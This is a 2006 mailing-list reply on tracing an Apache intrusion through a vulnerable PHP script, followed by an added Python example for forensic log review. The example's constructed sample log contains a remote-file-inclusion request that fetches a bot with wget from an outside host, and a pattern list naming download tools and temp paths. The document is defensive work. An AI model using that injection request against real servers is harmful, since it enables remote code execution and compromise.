
Re: security issues with apache!



On Tue, Mar 07, 2006 at 12:37:42PM +0100, Ismail wrote:
> >>Recently I've noticed that my Apache-installation gets violated and that
> >>an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> >>makes Apache execute these. Unfortunately these are some rather nasty
> >>things, mostly portscanners and bruteforce-attacks. They are all easily
> >>detected with netstat, and at least once a day I have to go in and kill
> >>the processes spawned by www-data (the user that runs Apache) as well as
> >>delete the offending files.
> >
> I had a similar encounter about 2 months ago. The intruder exploited a 
> PHP script that was poorly written. If you check your http access logs, 
> you will most likely find an entry about the PHP that is being exploited. 

Sounds familiar, I'd be suspecting php scripts or similar. The first
thing I can suggest is mod_security, this is essentially an application
level firewall for apache, and lets you block things like 'wget', even
if they're encoded as say wg%65t. It supports logging all requests for
audit purposes.

As for figuring out what is at fault, one thing to look at is timestamps
of the payload, in particular ctime. Then compare against your apache
logs and you should be able to get a shortlist of 5-10 seconds worth of
requests. POSTs are problematic as their data isn't in the apache logs,
but in combination with mod_security you should be able to finger the
exact request.

Finally, a bit of a plug. I wrote a script to look for processes hanging
off apache that have been there for too long e.g. a bot. Code at:
http://www.netsoc.tcd.ie/~bbrazil/code/brmon/ (long_running_apache).

Brian

-- 
Website: http://www.netsoc.tcd.ie/~bbrazil


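The two techniques in Brian's reply, working back from the payload's ctime to a short window of access-log requests, and percent-decoding request URLs so an obfuscated wg%65t shows up as wget, as an added worked example. This is not code from the original post, from mod_security or from the brmon script; the log lines, the IP addresses, the ctime and the list of suspicious strings are all constructed for illustration, and the log regex assumes Apache's "combined" format.

```python
"""Shortlist the access-log requests that preceded a dropped payload and
percent-decode their URLs so encoded tool names become readable.
Added example; the sample data below is constructed, not real."""
import os
import re
import sys
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (assumption:
# the server logs in that format). Not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2006:11:02:13 +0100] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Mar/2006:11:02:19 +0100] "GET /gallery.php?file=http://198.51.100.9/x.txt?&cmd=cd%20/tmp;wg%65t%20198.51.100.9/bot.pl HTTP/1.1" 200 312 "-" "Mozilla/4.0"
198.51.100.4 - - [07/Mar/2006:11:02:20 +0100] "POST /contact.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.55 - - [07/Mar/2006:11:15:44 +0100] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Constructed ctime of the dropped file, as if read from stat(2) on /tmp/bot.pl.
SAMPLE_CTIME = datetime(2006, 3, 7, 11, 2, 21, tzinfo=timezone(timedelta(hours=1)))

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Things that have no business in a request to a web app: download tools,
# temp paths, shell metacharacters. This list is an assumption for the
# example; tune it to the site rather than treating it as a ruleset.
SUSPICIOUS = re.compile(r'wget|curl|fetch|chmod|/tmp|/var/tmp|[;|`]', re.I)


def decode_url(url, rounds=3):
    """Percent-decode repeatedly so wg%65t and double-encoded wg%2565t
    both come out as 'wget'. Stops early once decoding is stable."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["decoded_url"] = decode_url(entry["url"])
    entry["suspicious"] = bool(SUSPICIOUS.search(entry["decoded_url"]))
    # POST bodies never reach the access log; those need mod_security's
    # audit log to be fingered, so mark them for manual review.
    entry["body_unlogged"] = entry["method"] == "POST"
    return entry


def requests_before(log_text, ctime, window_seconds=10):
    """Entries whose timestamp falls in the window_seconds before ctime,
    oldest first. The payload is written after the request that fetched
    it, so the window runs backwards from the file's ctime."""
    start = ctime - timedelta(seconds=window_seconds)
    hits = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and start <= e["time"] <= ctime:
            hits.append(e)
    return hits


def payload_ctime(path):
    """ctime of a dropped file as a timezone-aware datetime (UTC)."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz=timezone.utc)


if __name__ == "__main__":
    # Usage: python3 finger.py /tmp/bot.pl /var/log/apache/access.log
    # With no arguments the constructed sample data is used.
    if len(sys.argv) == 3:
        ctime = payload_ctime(sys.argv[1])
        with open(sys.argv[2]) as fh:
            log_text = fh.read()
    else:
        ctime, log_text = SAMPLE_CTIME, SAMPLE_LOG
    for e in requests_before(log_text, ctime):
        tag = "SUSPECT" if e["suspicious"] else ("POST?  " if e["body_unlogged"] else "       ")
        print(tag, e["ts"], e["ip"], e["method"], e["decoded_url"])
```

Run against a real server it stat()s the payload and reads the log you name; the window defaults to the 5-10 seconds Brian mentions and can be widened if the clock on the box is not trustworthy. The POST marker is the caveat from the post made concrete: a POST in the window with a clean URL is still a candidate, because its body is only visible if mod_security audit logging was on.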
